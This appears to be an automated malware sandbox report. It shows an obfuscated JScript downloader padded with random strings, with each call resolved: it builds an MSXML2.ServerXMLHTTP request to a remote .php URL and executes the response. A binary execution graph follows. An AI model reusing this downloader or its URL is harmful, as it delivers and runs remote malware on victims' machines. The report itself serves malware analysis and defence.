ZCSjGsUOvQtjKgFsARhfVYkNQdPzTknsfWnBhoSDDXPWwHQSvurYcCTkViDOaeDYFxJNqvDlbzvpkWpvanUjLSfcUdXKdKcAfaMpBmacnZaWCoyCgFFgLROqoYtcIcTmnvhmSrQxRqrOPEmpRLFYxJxrmdeNrYLfPiRadbXKoUQBlYFMSZCSDJCjEiLebslgwGyMXEOcxQWmwbvjDJZafWHFnJXwgyGtlXqWGeJwMpRDPFevGQCSuGZTwWpJByrZtivCVQqiBBmoVAOChmkrNGPTVfwZSsYMoOMPevTPhKDDbrjOrUlIbZzwTxCGKDlddaNyYBFYOaJZuqHxnJsbFmszICHBullxCTPEgRtkBhLENWnvEaaByJKQwISfguFkjjbhnFDfBmIwIoxHlMelBJHwizxAElmrfWEeuVTdOTntbEHDGewnDSQSZGycMRiRwfnCeaGlplaWRFwyllxMRoCPPjxtFaAyLKYmvwUScAqIzGmxipKoqTRngmeYdCTHZmSwXcVZdegbYaHdywnzMyWAMQbMPLVMkRUKvvtnZEzomTjmcIBcZcsJatsGVGIekLdbwTJHsLgkALeYwQJHvNMGnWnQdFDafbJDLGAfnEITfnndkGEMVFxmFGjNSYVfFZallYFgnjigsQnfXoDLssDJgwfAgwGfvJqrFugUPYkLhwGfwyBZZQZZIqSTpUHtjsvSYTBYmeXlPOcoIGUygCKsydbByjNzfdEvTAMDUKZkeWCUZCwLPeEvbtqCDwZBarawDvBDwCvpTDiMVQZaOJxeJJkEMClNmlusjYYofMChgdubRCaeDRltCtpNKqoNLgkotGdewSQGmZEaDWAhkEUmnjEaGRCbqPYDWoxhzqSDqkxNHOYylasLZmrlhOoXNlVNzQagQafXnSvRVeEXQHZLGpUQIXGWLhxZEdhqvoNtCCGBRGBtQdIVqxDvnYvYDDZSUKRqAubrkfZrBstMcPvqKuxMUCeXcRCReQkNJbmQeLDbRKtluFyTtyhOjWPgQMQTAeituvqKKHkjLJHztJhIxvTJTqrkxBUizkyRaLJUWRmRFFmaEdxIIDhCTSIRmXEKIzLIwIXrlVjEMHIODBECgxstXckvecolxGQdEumwysJINjYpjhudySRWXEHwtqXVNOlNBOtXjwGWGqxayyIDnykqMPsqrLlJgPmyxbXpIXhQaCWYOwOrwAkNBRoXgPwUFHLNsewITWXUmljsuicPEIFuYXYjPdvfFVscuSghLKbBSbLlyHUDBbAqxhlWrKoDtSuSoaKDQNoekbTxlMRbrrxxuQsERTPRc*/ var yJhKsVTcN=new ActiveXObject(/* VXKQItXlksINNwiLwCNjbDrosSpPafnEeISJUUBoSoszdeIxmgDbPeYmcqMMpEipteLbWdTjIMYVVTTjCNtTmqESpuPJMjqdWUelmtCVPZGVYJMTclhjtysPyFkNKgkzwlhxyElgeyIApGcwpKavaafJpaSRzKwqppuMvoObZjqteRjOOkpKSufxRpFVAAUDjMBIQHGYXHMwewlyKVtWJspsKXOipNmKNcXCfLKDFrazSnyyZCkIxcZvDJKcOGhLSWQFSGwCkteJvmaJsjehbbCYoPONpMMHhccziipgaTlwPSohBWtNpDCMhPJqIpvkpJvXtjnOzKqRQyMQBTHzyQJXGTGBkqvFuZozHGFQolHcjnFMEbRCtaSnBCdaCRTVisqpoTbYZftTeSzFqXCLgYteqEDArTLJDQRhWyKUHBUxiFbPWtxantDxFiPHmheLWKDHlSDSebRmjdRiGfosyVdMdWCXKuljLAsvkoFqcGPFtlVzTHrGOHOhCQjtVkvTfmkLmpxnIKscLEhGudIlmGvPFmCvPMWUyimGbcBgDEpxmLjwLLbiuWZOkmOVFKwdwHkWRYAVJJYIBpWooJHQBzpCYrQfdyEIkfciMpyxacykbbfLxPrXo"
                                                                  • ("https://magydostravel.com/cdn/91c818ee6e9ec29f8c1.php") ➔ " /*bmGHnpjSkYQIlQlyHvcRXvRCsYRVBhoCHeNGbqWbwwWVkqIpNFmxjdbskNuCATeNpLxCJEaUCxQlrBHoXaHnxGJKlEaDXjqHgHwriBGOZlZrerUegflpMCOUmuGXdSsCtGJRYzMtMlUfZRsOBQsoJZhexgnQxIEUsiuZhZFzFcwHJYiLKIcjASjITVArKefAiElEKXustADnFbQAUvqVgtVnJMTEPvxZSsNAXigWzQVyiJqamrrfUOoTQcfigcqqjjVLmlhhgOpvKCEwsEjwfJGTUTskoYYirHQfTMoDokojDojSFsLXLBoPSoDQjEooXpeyqrtAKmTLSyiFBpsQRZfFZuwzWdhNUWkgpeEwVtbvvGRfvFQSwryNjhxDsomVMdgrlbiGIEWBFECXAUkGViVnMouuaTvOldNuiDZTNEjasifKkflOjLmDSVjqwwKQUxsayxDJMvfHyeJUDpeEtQAPBjHzEAIwsGYtmEkREtekuBJYKqUuDeMBrNmiaRUBkEbNOLlCXyKJHYHhcoDnbIjiTyZQxMzQnbgkJhMeAEVQbSLYihMTCHVANXRhIgoojEnuImPdAvVGDycFigceUADVxWyQfbsDaUUsDFoYMnIPDhFnAsBQkpnpQwcHmNsAKjMOpnVqaZcaJpJBrIPYWDRMpJtmPzBDDZmzYMJIPYhfcwFyifNnjoAveiYYoOKqhFIlFzByEIrJHjlDTRgHQywRfyfbtXjrucodiagTFdVtgJtRsxBxPRjEQAktQgJahpBcFyhQZYyBCQYnqRdWFomwoNLneYeGDIfrMRQbCfLBVpdHbQSgfuYItIHMAzkbeoqQfxGNVyyluCakuqACtErIFsSgvUtLRTFIadNxZqmFKQcRxDinyjrTtkltzmZyTgvAXeIseynXbNQfpUxFnhlTJmwPGfoQNsYKOlibQjjeEDxZmaSrUdJFEvExxHbGGlRluYyqEUmDqBDBIwxDvxAtvXdBIIpkyWmcSGbfWBpQstmcKMaeUVvBqDjdsxYwdhjanOsKSQARUrHElgFGPiwUzaApRvabxNqgMNEKjvVHrUHkFufoLQFZBpgmOXnyrHXXxAGNGAKWhkAxAOskMLmzZhgvvRKoljykHZOINNqjBHVmIgjPEdooNJgUSoKwUHhAgsRsgtFUMIzhoqmEiOHvMpgORvbWyLaUWlhjASireAYBHLWANGFzyvADSorljDLQqhaNfFeMImuYhkPGBtUlSlPgpnUeaqABGSYIBjRWORotpFDNwWdRBBEUeXpOUbsgGdPRWcdHjkSqtTkyEFeEwtCTxMnbtSUzBjikDKrCEnyfYwkyqukFrAqfrSPctIIbNMzLKEDMkbtpCJBTsenQIVWCnnRtkCjgUHqEuErttGVSpjHvFpVDOJdeyIuBEDQOruWwoGhDsCxRomKrqbKlzZXWZtacqwVNmIzzvoFvjAClKznDOuJsaDnXgQgOSbjDEPTAModTQqZNLczWzcUtPvltImPFvdEOEcImjPtuAzgOBiHTRGgBpyYdroNyWBXeRdEmuECEVCYqwIYBlVIBYzioINvBNevWcBliuRdjVMHyaZlLaHdBoFNjhgZqzqaRXStbCGQbFRacYqqZNZtiFpnRDVZcbumGuBToDTNEwMKTyxZkCANnbjXXqUcFSNHZOOgqZPILDbRqzcvkryrQsjgHYmsapqKlbBkBcBynyposURJceftpiDBTEsikINBcZRtdAWhfXsruNgoaRcBBpiMOADebUemXBTVuIUqqMFAhTZQvwvURJDbYPqHFJcYrPIiwwRjjEugFaBzkWggCgerVEmiXGUHpBEuBrQmyiEpcMOvzrJZYLtMdjKDkiDMwQqDeALFSJiAiMqeOBprOIsJXlsmBnGvaFsFWmBqThFXjdwKOmJdaeZEEJQwDndqOhggGxzyIIEhVZeuiIFaeJpYZcSqlrNgrvyFvtDHOAaCEaKwLWswBHwuGrYlHlbgdWrPaSONXtCBEQWTRTqVEjKzHgpVrvgkdtHtijZxpPYcStcIzBfUWrVpPCZVVlwtvqtviQpjLHvkfWGdUNzYPbOVWaduaCTLzwwafsvqUMNzbjbWuRaHEDfNZCSjGsUOvQtjKgFsARhfVYkNQdPzTknsfWnBhoSDDXPWwHQSvurYcCTkViDOaeDYFxJNqvDlbzvpkWpvanUjLSfcUdXKdKcAfaMpBmacnZaWCoyCgFFgLROqoYtcIcTmnvhmSrQxRqrOPEmpRLFYxJxrmdeNrYLfPiRadbXKoUQBlYFMSZCSDJCjEiLebslgwGyMXEOcxQWmwbvjDJZafWHFnJXwgyGtlXqWGeJwMpRDPFevGQCSuGZTwWpJByrZtivCVQqiBBmoVAOChmkrNGPTVfwZSsYMoOMPevTPhKDDbrjOrUlIbZzwTxCGKDlddaNyYBFYOaJZuqHxnJsbFmszICHBullxCTPEgRtkBhLENWnvEaaByJKQwISfguFkjjbhnFDfBmIwIoxHlMelBJHwizxAElmrfWEeuVTdOTntbEHDGewnDSQSZGycMRiRwfnCeaGlplaWRFwyllxMRoCPPjxtFaAyLKYmvwUScAqIzGmxipKoqTRngmeYdCTHZmSwXcVZdegbYaHdywnzMyWAMQbMPLVMkRUKvvtnZEzomTjmcIBcZcsJatsGVGIekLdbwTJHsLgkALeYwQJHvNMGnWnQdFDafbJDLGAfnEITfnndkGEMVFxmFGjNSYVfFZallYFgnjigsQnfXoDLssDJgwfAgwGfvJqrFugUPYkLhwGfwyBZZQZZIqSTpUHtjsvSYTBYmeXlPOcoIGUygCKsydbByjNzfdEvTAMDUKZkeWCUZCwLPeEvbtqCDwZBarawDvBDwCvpTDiMVQZaOJxeJJkEMClNmlusjYYofMChgdubRCaeDRltCtpNKqoNLgkotGdewSQGmZEaDWAhkEUmnjEaGRCbqPYDWoxhzqSDqkxNHOYylasLZmrlhOoXNlVNzQagQafXnSvRVeEXQHZLGpUQIXGWLhxZEdhqvoNtCCGBRGBtQdIVqxDvnYvYDDZSUKRqAubrkfZrBstMcPvqKuxMUCeXcRCReQkNJbmQeLDbRKtluFyTtyhOjWPgQMQTAeituvqKKHkjLJHztJhIxvTJTqrkxBUizkyRaLJUWRmRFFmaEdxIIDhCTSIRmXEKIzLIwIXrlVjEMHIODBECgxstXckvecolxGQdEumwysJINjYpjhudySRWXEHwtqXVNOlNBOtXjwGWGqxayyIDnykqMPsqrLlJgPmyxbXpIXhQaCWYOwOrwAkNBRoXgPwUFHLNsewITWXUmljsuicPEIFuYXYjPdvfFVscuSghLKbBSbLlyHUDBbAqxhlWrKoDtSuSoaKDQNoekbTxlMRbrrxxuQsERTPRc*/ var yJhKsVTcN=new ActiveXObject(/* VXKQItXlksINNwiLwCNjbDrosSpPafnEeISJUUBoSoszdeIxmgDbPeYmcqMMpEipteLbWdTjIMYVVTTjCNtTmqESpuPJMjqdWUelmtCVPZGVYJMTclhjtysPyFkNKgkzwlhxyElgeyIApGcwpKavaafJpaSRzKwqppuMvoObZjqteRjOOkpKSufxRpFVAAUDjMBIQHGYXHMwewlyKVtWJspsKXOipNmKNcXCfLKDFrazSnyyZCkIxcZvDJKcOGhLSWQFSGwCkteJvmaJsjehbbCYoPONpMMHhccziipgaTlwPSohBWtNpDCMhPJqIpvkpJvXtjnOzKqRQyMQBTHzyQJXGTGBkqvFuZozHGFQolHcjnFMEbRCtaSnBCdaCRTVisqpoTbYZftTeSzFqXCLgYteqEDArTLJDQRhWyKUHBUxiFbPWtxantDxFiPHmheLWKDHlSDSebRmjdRiGfosyVdMdWCXKuljLAsvkoFqcGPFtlVzTHrGOHOhCQjtVkvTfmkLmpxnIKscLEhGudIlmGvPFmCvPMWUyimGbcBgDEpxmLjwLLbiuWZOkmOVFKwdwHkWRYAVJJYIBpWooJHQBzpCYrQfdyEIkfciMpyxacykbbfLxPrXo"
                                                                  5
                                                                  aa = Function ( 'asxc', 'return WScri' + 'pt.CreateObject(asxc)' );
                                                                  • Function("asxc","return WScript.CreateObject(asxc)") ➔ function anonymous(asxc)
                                                                  6
                                                                  var n = aa ( 'MSX' + 'ML2.Server' + 'XMLHT' + 'TP.6.0' );
                                                                  • aa("MSXML2.ServerXMLHTTP.6.0") ➔
                                                                  7
                                                                  return n.open ( 'GE' + 'T', e, ! 1 ), n.send ( ), n.responseText;
                                                                  • open("GET","https://magydostravel.com/cdn/91c818ee6e9ec29f8c1.php",false) ➔ undefined
                                                                  • send() ➔ undefined
                                                                  8
                                                                  } ( 'ht' + 'tps://magyd' + 'ostravel.com/cdn/91c818ee6e9ec29f8c1.php' ), Function ( e ) ( );
                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:4.8%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:18.4%
                                                                      Total number of Nodes:2000
                                                                      Total number of Limit Nodes:17
                                                                      execution_graph 51180 46e717 51189 46e7bc 51180->51189 51183 46e728 GetCurrentProcess TerminateProcess 51184 46e739 51183->51184 51185 46e7a3 51184->51185 51186 46e7aa ExitProcess 51184->51186 51192 46e7c5 LeaveCriticalSection ctype 51185->51192 51188 46e7a8 51193 46e56a 51189->51193 51191 46e71d 51191->51183 51191->51184 51192->51188 51194 46e5c0 EnterCriticalSection 51193->51194 51195 46e582 51193->51195 51194->51191 51198 46e598 51195->51198 51206 46d03c 7 API calls ctype 51195->51206 51197 46e56a ctype 15 API calls 51199 46e5a0 51197->51199 51198->51197 51200 46e5a7 InitializeCriticalSection 51199->51200 51201 46e5b1 51199->51201 51202 46e5b6 51200->51202 51207 46c0ff 51201->51207 51224 46e5cb LeaveCriticalSection 51202->51224 51205 46e5be 51205->51194 51206->51198 51208 46c12d 51207->51208 51209 46c1d9 51207->51209 51210 46c137 51208->51210 51211 46c172 51208->51211 51209->51202 51213 46e56a ctype 16 API calls 51210->51213 51212 46c163 51211->51212 51215 46e56a ctype 16 API calls 51211->51215 51212->51209 51214 46c1cb RtlFreeHeap 51212->51214 51216 46c13e ctype 51213->51216 51214->51209 51217 46c17e ctype 51215->51217 51218 46c158 51216->51218 51225 46eb36 VirtualFree VirtualFree HeapFree ctype 51216->51225 51220 46c1aa 51217->51220 51227 46f8bd VirtualFree HeapFree VirtualFree ctype 51217->51227 51226 46c169 LeaveCriticalSection ctype 51218->51226 51228 46c1c1 LeaveCriticalSection ctype 51220->51228 51224->51205 51225->51218 51226->51212 51227->51220 51228->51212 51229 46bfd7 51230 46c000 51229->51230 51232 46bfde 51229->51232 51232->51230 51233 46c003 51232->51233 51234 46c030 51233->51234 51238 46c073 51233->51238 51235 46e56a ctype 17 API calls 51234->51235 51241 46c05e 51234->51241 51236 46c046 51235->51236 51251 46ee5f HeapReAlloc HeapAlloc VirtualAlloc HeapFree VirtualAlloc 51236->51251 51237 46c0e2 RtlAllocateHeap 51248 46c065 51237->51248 51240 46c095 51238->51240 51238->51241 51243 46e56a ctype 17 API calls 51240->51243 51241->51237 51241->51248 51242 46c051 51252 46c06a LeaveCriticalSection ctype 51242->51252 51245 46c09c 51243->51245 51253 46f902 6 API calls 51245->51253 51247 46c0af 51254 46c0c9 LeaveCriticalSection ctype 51247->51254 51248->51232 51250 46c0bc 51250->51241 51250->51248 51251->51242 51252->51241 51253->51247 51254->51250 51255 401ba3 51256 401bcb 51255->51256 51259 407cd5 51256->51259 51258 401bd2 51262 46b3a4 51259->51262 51263 46b3b2 ctype 51262->51263 51272 46c2a4 51263->51272 51265 46b3bd 51278 46d13c 51265->51278 51271 407ce4 51271->51258 51273 46c2b1 51272->51273 51274 46c2c8 EnterCriticalSection 51272->51274 51273->51274 51275 46c2b8 51273->51275 51274->51265 51276 46e56a ctype 17 API calls 51275->51276 51277 46c2c6 51276->51277 51277->51265 51279 46b3d1 51278->51279 51281 46d160 51278->51281 51284 46d112 51279->51284 51281->51279 51294 46c453 31 API calls 51281->51294 51295 4702cb 51281->51295 51309 4704bb 51281->51309 51285 46d11a 51284->51285 51287 46b3db 51284->51287 51285->51287 51364 46c453 31 API calls 51285->51364 51288 46c2f6 51287->51288 51289 46c303 51288->51289 51290 46c31a LeaveCriticalSection 51288->51290 51289->51290 51291 46c30a 51289->51291 51290->51271 51365 46e5cb LeaveCriticalSection 51291->51365 51293 46c318 51293->51271 51294->51281 51296 470318 51295->51296 51297 4702d8 51295->51297 51354 470646 12 API calls 51296->51354 51297->51296 51299 4702f3 51297->51299 51319 471359 51299->51319 51300 47031d 51355 47064f 12 API calls 51300->51355 51303 4702fa 51328 470330 51303->51328 51304 470328 51304->51281 51308 470310 51308->51281 51310 4704d1 51309->51310 51316 470555 51309->51316 51311 470536 51310->51311 51312 47059d 51310->51312 51310->51316 51314 47054d 51311->51314 51317 47055d 51311->51317 51313 4702cb 31 API calls 51312->51313 51313->51316 51315 4702cb 31 API calls 51314->51315 51315->51316 51316->51281 51317->51316 51363 47165c 27 API calls 51317->51363 51320 4713a7 EnterCriticalSection 51319->51320 51321 471384 51319->51321 51320->51303 51322 46e56a ctype 17 API calls 51321->51322 51323 47138b 51322->51323 51324 471392 InitializeCriticalSection 51323->51324 51325 47139f 51323->51325 51324->51325 51356 46e5cb LeaveCriticalSection 51325->51356 51327 4713a6 51327->51320 51329 470350 51328->51329 51351 470308 51328->51351 51330 470372 51329->51330 51331 470380 51329->51331 51357 4716c1 14 API calls 51330->51357 51333 47044f WriteFile 51331->51333 51340 47038e 51331->51340 51336 470466 51333->51336 51337 470471 GetLastError 51333->51337 51334 47037d 51334->51331 51335 47048a 51335->51351 51361 470646 12 API calls 51335->51361 51338 470416 51336->51338 51337->51338 51338->51335 51342 470428 51338->51342 51338->51351 51340->51335 51340->51338 51341 4703da WriteFile 51340->51341 51341->51340 51344 470444 GetLastError 51341->51344 51345 470430 51342->51345 51346 47047c 51342->51346 51343 4704a4 51362 47064f 12 API calls 51343->51362 51344->51338 51358 470646 12 API calls 51345->51358 51360 4705d3 12 API calls 51346->51360 51350 470435 51359 47064f 12 API calls 51350->51359 51353 4713b8 LeaveCriticalSection 51351->51353 51353->51308 51354->51300 51355->51304 51356->51327 51357->51334 51358->51350 51359->51351 51360->51351 51361->51343 51362->51351 51363->51316 51364->51287 51365->51293 51366 427386 51367 427393 51366->51367 51371 4273a4 51366->51371 51367->51371 51372 4273c5 51367->51372 51373 4273cf __EH_prolog 51372->51373 51387 40862d 51373->51387 51378 40862d ctype 17 API calls 51379 427415 51378->51379 51380 408604 ctype 17 API calls 51379->51380 51381 427420 51380->51381 51396 423635 17 API calls 2 library calls 51381->51396 51383 42739e 51384 407a18 51383->51384 51385 46c0ff ctype 17 API calls 51384->51385 51386 407a21 51385->51386 51386->51371 51397 408642 51387->51397 51390 408604 51391 40860f 51390->51391 51392 40862d ctype 17 API calls 51391->51392 51393 408617 51392->51393 51394 407a18 ctype 17 API calls 51393->51394 51395 40861f 51394->51395 51395->51378 51396->51383 51400 42751a 51397->51400 51398 408634 51398->51390 51401 427531 51400->51401 51402 427569 51401->51402 51404 407a18 ctype 17 API calls 51401->51404 51405 423db2 51401->51405 51402->51398 51404->51401 51406 423dbc __EH_prolog 51405->51406 51407 408604 ctype 17 API calls 51406->51407 51408 423dd7 51407->51408 51409 408604 ctype 17 API calls 51408->51409 51410 423de6 51409->51410 51411 40862d ctype 17 API calls 51410->51411 51412 423e00 51411->51412 51413 408604 ctype 17 API calls 51412->51413 51414 423e0b 51413->51414 51415 40862d ctype 17 API calls 51414->51415 51416 423e22 51415->51416 51417 408604 ctype 17 API calls 51416->51417 51418 423e2d 51417->51418 51421 4239ef 51418->51421 51422 4239f9 __EH_prolog 51421->51422 51423 408604 ctype 17 API calls 51422->51423 51424 423a0f 51423->51424 51425 408604 ctype 17 API calls 51424->51425 51426 423a1b 51425->51426 51427 408604 ctype 17 API calls 51426->51427 51428 423a27 51427->51428 51429 408604 ctype 17 API calls 51428->51429 51430 423a33 51429->51430 51430->51401 51431 40d875 51432 40d882 51431->51432 51433 40d893 51431->51433 51432->51433 51437 40d89a 51432->51437 51436 407a18 ctype 17 API calls 51436->51433 51438 40d8a4 __EH_prolog 51437->51438 51441 4585e0 51438->51441 51442 4585e4 VirtualFree 51441->51442 51443 40d88d 51441->51443 51442->51443 51443->51436 51444 4585b0 51445 46c0ff ctype 17 API calls 51444->51445 51446 4585b6 51445->51446 51447 46cf4c GetVersion 51474 46ea66 HeapCreate 51447->51474 51449 46cfaa 51450 46cfb7 51449->51450 51451 46cfaf 51449->51451 51486 46e31c 51450->51486 51551 46d061 8 API calls ctype 51451->51551 51455 46cfbc 51456 46cfc0 51455->51456 51457 46cfc8 51455->51457 51552 46d061 8 API calls ctype 51456->51552 51494 46fcd7 51457->51494 51461 46cfd1 GetCommandLineA 51505 470ad6 51461->51505 51465 46cfeb 51531 4707d0 51465->51531 51467 46cff0 51541 405c72 51467->51541 51471 46d01d 51554 470658 13 API calls 51471->51554 51473 46d02e 51475 46ea86 51474->51475 51476 46eabc 51474->51476 51555 46e91e 44 API calls 51475->51555 51476->51449 51478 46ea8b 51479 46ea95 51478->51479 51480 46eaa2 51478->51480 51556 46eac3 HeapAlloc 51479->51556 51482 46eabf 51480->51482 51557 46f60a HeapAlloc VirtualAlloc VirtualAlloc VirtualFree HeapFree 51480->51557 51482->51449 51483 46ea9f 51483->51482 51485 46eab0 HeapDestroy 51483->51485 51485->51476 51558 46e541 InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 51486->51558 51488 46e322 TlsAlloc 51489 46e332 51488->51489 51490 46e36c 51488->51490 51489->51490 51491 46e343 TlsSetValue 51489->51491 51490->51455 51491->51490 51492 46e354 51491->51492 51493 46e35a GetCurrentThreadId 51492->51493 51493->51455 51495 46fcea 51494->51495 51496 46fcf8 GetStartupInfoA 51495->51496 51559 46d03c 7 API calls ctype 51495->51559 51499 46fd46 51496->51499 51500 46fe17 51496->51500 51499->51500 51504 46fddf GetFileType 51499->51504 51501 46fe42 GetStdHandle 51500->51501 51502 46fe82 SetHandleCount 51500->51502 51501->51500 51503 46fe50 GetFileType 51501->51503 51502->51461 51503->51500 51504->51499 51506 470b24 51505->51506 51507 470af1 GetEnvironmentStringsW 51505->51507 51509 470af9 51506->51509 51510 470b15 51506->51510 51508 470b05 GetEnvironmentStrings 51507->51508 51507->51509 51508->51510 51511 46cfe1 51508->51511 51512 470b31 GetEnvironmentStringsW 51509->51512 51513 470b3d WideCharToMultiByte 51509->51513 51510->51511 51514 470bb7 GetEnvironmentStrings 51510->51514 51522 470bc3 51510->51522 51524 470889 51511->51524 51512->51511 51512->51513 51516 470ba3 FreeEnvironmentStringsW 51513->51516 51517 470b71 51513->51517 51514->51511 51514->51522 51516->51511 51517->51516 51518 470b80 WideCharToMultiByte 51517->51518 51520 470b91 51518->51520 51521 470b9a 51518->51521 51519 470bf4 FreeEnvironmentStringsA 51519->51511 51523 46c0ff ctype 17 API calls 51520->51523 51521->51516 51522->51519 51523->51521 51525 4708a0 GetModuleFileNameA 51524->51525 51526 47089b 51524->51526 51528 4708c3 51525->51528 51560 471c08 36 API calls 51526->51560 51529 4708f4 51528->51529 51561 46d03c 7 API calls ctype 51528->51561 51529->51465 51532 4707dd 51531->51532 51534 4707e2 ctype 51531->51534 51562 471c08 36 API calls 51532->51562 51540 470823 ctype 51534->51540 51563 46d03c 7 API calls ctype 51534->51563 51536 470866 51537 46c0ff ctype 17 API calls 51536->51537 51538 470872 51537->51538 51538->51467 51540->51536 51564 46d03c 7 API calls ctype 51540->51564 51542 405c7c __EH_prolog 51541->51542 51565 405f22 GetVersionExA 51542->51565 51548 405cae 51857 401917 SetConsoleCtrlHandler 51548->51857 51553 46e6f5 20 API calls 51553->51471 51554->51473 51555->51478 51556->51483 51557->51483 51558->51488 51559->51496 51560->51525 51561->51529 51562->51534 51563->51540 51564->51540 51566 405c94 51565->51566 51567 4018a2 SetConsoleCtrlHandler 51566->51567 51568 4018c0 51567->51568 51569 4018d5 51567->51569 51861 46b8f4 RaiseException 51568->51861 51571 403a70 51569->51571 51862 46b890 51571->51862 51573 403a7a SetFileApisToOEM 51863 405b9f 51573->51863 51575 403a91 GetCommandLineW 51864 403532 51575->51864 51580 407a18 ctype 17 API calls 51581 403ac8 51580->51581 51582 403aea 51581->51582 51583 403acf 51581->51583 51890 4036d9 51582->51890 52132 4051e3 33 API calls 51583->52132 51586 403adb 51589 40862d ctype 17 API calls 51586->51589 51587 403af5 51894 404c12 51587->51894 51591 403f72 51589->51591 51594 408604 ctype 17 API calls 51591->51594 51593 403b0c 51596 403b62 51593->51596 51597 403b2c 51593->51597 51595 403f7e 51594->51595 51595->51548 51599 403b77 51596->51599 51600 403b6b 51596->51600 52133 4051e3 33 API calls 51597->52133 51603 403ba2 51599->51603 52137 4051e3 33 API calls 51599->52137 52136 458600 GetModuleHandleA GetProcAddress 51600->52136 51601 403b38 52134 406e46 17 API calls 2 library calls 51601->52134 51911 41035d 51603->51911 51605 403b70 51605->51599 51608 403b44 52135 405233 17 API calls 2 library calls 51608->52135 51612 403bb8 51989 41741c 51612->51989 51616 403c4d 52000 4176be 51616->52000 51619 403c08 51619->51616 52139 46b8f4 RaiseException 51619->52139 51621 403c8e 51623 403c9b 51621->51623 51630 403ecc ctype 51621->51630 51631 407cd5 33 API calls 51623->51631 51624 40400d 51625 404572 51624->51625 51626 404017 51624->51626 51627 4079f2 RaiseException 51625->51627 51628 4049d4 51626->51628 51629 404024 51626->51629 51633 404579 51627->51633 52187 40279e 128 API calls 2 library calls 51628->52187 51640 404500 51629->51640 51641 404037 51629->51641 51630->51624 51634 403f96 51630->51634 52144 401679 58 API calls 3 library calls 51630->52144 51747 403cb5 51631->51747 51636 40458c 51633->51636 52180 4053ad 18 API calls 51633->52180 52148 4012bb 67 API calls 51634->52148 52012 401e26 51636->52012 51638 403f9b 51648 403fa8 51638->51648 51649 403ffc 51638->51649 51856 404507 51638->51856 52177 40519b 34 API calls 51640->52177 51645 404059 51641->51645 52152 403593 51641->52152 51642 403f0b 51651 403f85 51642->51651 51652 403f18 51642->51652 51642->51856 51644 404aaf 51653 404abf 51644->51653 51644->51856 51654 40347f 18 API calls 51645->51654 51646 403e63 51671 407cd5 33 API calls 51646->51671 51647 408604 ctype 17 API calls 51658 404513 51647->51658 51659 407cd5 33 API calls 51648->51659 52151 46b8f4 RaiseException 51649->52151 51650 404a22 51650->51644 51660 407cd5 33 API calls 51650->51660 52147 46b8f4 RaiseException 51651->52147 51661 407cd5 33 API calls 51652->51661 51664 404ad0 51653->51664 52190 46b8f4 RaiseException 51653->52190 51666 404064 51654->51666 51656 407cd5 33 API calls 51656->51747 52178 406e46 17 API calls 2 library calls 51658->52178 51668 403fb4 51659->51668 51669 404a51 51660->51669 51670 403f24 51661->51670 51664->51548 51679 401e26 18 API calls 51666->51679 51674 408604 ctype 17 API calls 51668->51674 51686 408604 ctype 17 API calls 51669->51686 51676 408604 ctype 17 API calls 51670->51676 51677 403e78 51671->51677 51680 403fc0 51674->51680 51682 403f30 51676->51682 51693 408604 ctype 17 API calls 51677->51693 51678 401e26 18 API calls 51683 40460f 51678->51683 51684 4040a4 51679->51684 52149 406e46 17 API calls 2 library calls 51680->52149 51681 404530 52179 405233 17 API calls 2 library calls 51681->52179 52145 406e46 17 API calls 2 library calls 51682->52145 52019 404b67 51683->52019 52156 40502a 18 API calls 51684->52156 51690 404a64 51686->51690 51689 40453f 51696 40862d ctype 17 API calls 51689->51696 52188 406e46 17 API calls 2 library calls 51690->52188 51699 403e8b 51693->51699 51694 40461a 51708 401e26 18 API calls 51694->51708 51695 4040af 51709 401e26 18 API calls 51695->51709 51700 404555 51696->51700 51697 403fda 52150 405233 17 API calls 2 library calls 51697->52150 51698 403f4a 52146 405233 17 API calls 2 library calls 51698->52146 52142 406e46 17 API calls 2 library calls 51699->52142 51705 408604 ctype 17 API calls 51700->51705 51705->51595 51706 404a7e 52189 405233 17 API calls 2 library calls 51706->52189 51707 403ea8 52143 405233 17 API calls 2 library calls 51707->52143 51712 40466f 51708->51712 51713 4040fb 51709->51713 51715 40862d ctype 17 API calls 51712->51715 52157 405172 17 API calls ctype 51713->52157 51714 40862d ctype 17 API calls 51717 404aa3 51714->51717 51718 404692 51715->51718 51720 408604 ctype 17 API calls 51717->51720 52022 405bba 51718->52022 51719 404113 52158 404baf 18 API calls __EH_prolog 51719->52158 51720->51644 51722 401e9a 18 API calls 51722->51747 51725 40411e 52159 419b56 18 API calls 2 library calls 51725->52159 51729 404139 51731 404153 51729->51731 51732 40413d 51729->51732 52161 419fde 154 API calls 2 library calls 51731->52161 52160 46b8f4 RaiseException 51732->52160 51736 40426b 51739 404365 51736->51739 51740 401e9a 18 API calls 51736->51740 51737 4046fa 51743 407cd5 33 API calls 51737->51743 51745 40471f 51737->51745 51738 405529 18 API calls 51738->51747 51741 404372 51739->51741 51742 404398 51739->51742 51746 404298 51740->51746 51753 407cd5 33 API calls 51741->51753 51757 40438c 51741->51757 51760 407cd5 33 API calls 51742->51760 51743->51745 51744 40417c 51744->51736 51750 407cd5 33 API calls 51744->51750 51751 407cd5 33 API calls 51745->51751 51755 404759 51745->51755 51752 4042c1 51746->51752 52163 405529 51746->52163 51747->51646 51747->51656 51747->51722 51747->51738 51748 407a18 ctype 17 API calls 51747->51748 51749 4054fe 18 API calls 51747->51749 52141 4035f2 18 API calls 51747->52141 51748->51747 51749->51747 51775 4041ab 51750->51775 51751->51755 51759 4042e1 51752->51759 51764 405529 18 API calls 51752->51764 51753->51757 51758 40477f 51755->51758 51774 4048d7 51755->51774 52173 4054de 17 API calls ctype 51757->52173 51763 404799 51758->51763 52181 46b8f4 RaiseException 51758->52181 51765 404301 51759->51765 51772 405529 18 API calls 51759->51772 51784 4043ae 51760->51784 51761 404489 52174 4050d8 35 API calls 2 library calls 51761->52174 51762 4042b8 52166 4035f2 18 API calls 51762->52166 51769 4047bd 51763->51769 51776 407cd5 33 API calls 51763->51776 51770 4042d8 51764->51770 51798 404336 51765->51798 52169 404b09 23 API calls 2 library calls 51765->52169 51789 407cd5 33 API calls 51769->51789 51797 404804 51769->51797 52167 4035f2 18 API calls 51770->52167 51771 404957 51779 407a18 ctype 17 API calls 51771->51779 51780 4042f8 51772->51780 51773 404498 51782 407a18 ctype 17 API calls 51773->51782 51790 407cd5 33 API calls 51774->51790 51799 404906 51774->51799 51800 40492f 51774->51800 51783 404221 